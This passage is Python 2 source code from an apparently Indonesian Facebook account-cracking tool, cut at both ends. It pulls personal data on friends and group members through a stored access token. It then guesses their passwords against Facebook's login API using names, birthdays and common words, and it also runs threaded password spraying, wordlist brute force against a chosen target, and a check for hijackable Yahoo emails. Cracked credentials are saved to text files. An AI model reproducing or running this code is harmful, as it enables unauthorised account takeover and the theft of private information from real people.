Logout' print '║-> \x1b[1;31;40m0. Exit' print '\x1b[1;37;40m║' pilih() def pilih(): zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Can\'t empty' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' os.system('git pull origin master') raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: if zedd == '6': os.system('rm -rf login.txt') os.system('xdg-open https://www.youtube.com/c/aadityaa') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel' pilih() def informasi(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 52 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] 
\x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mNot found' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] User not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() def menu_hack(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)' print '║-> \x1b[1;37;40m5. Yahoo Checker' print '║-> \x1b[1;37;40m6. Get ID/Email/HP' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' hack_pilih() def hack_pilih(): hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] 
Can\'t empty' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found' hack_pilih() def mini(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Target must be your friend !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' 
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] 
\x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' 
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Sorry, opening password target failed :(' print '\x1b[1;91m[!] Try other method.' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] 
File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Connection busy' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' def hasil(): print print 52 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Crack from Friends' print '║-> \x1b[1;37;40m2. Crack from Group' print '║-> \x1b[1;37;40m3. Crack from File' print '║-> \x1b[1;31;40m0. Kembali' print '\x1b[1;37;40m║' pilih_super() def pilih_super(): peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Can\'t empty' pilih_super() else: if peak == '1': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '3': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' try: idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') for line in open(idlist,'r').readlines(): id.append(line.strip()) except IOError: print '\x1b[1;91m[!] 
File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) print print 52 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1 else: pass2 = b['firs_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2 else: pass3 = b['last_name'] + '123' data = 
urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3 else: lahir = b['birthday'] pass4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4 else: pass5 = ('sayang') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5 else: pass6 = ('sayangku') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + 
'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6 except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() def brute(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' 
print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File not found...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. From Friends' print '║-> \x1b[1;37;40m2. From File' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' yahoo_pilih() def yahoo_pilih(): go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] 
Can\'t empty' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found' yahoo_pilih() def yahoofriends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(friends.text) save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail 
\x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mFinish' print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mFinish' print '\x1b[1;91m[+] \x1b[1;97mSaved 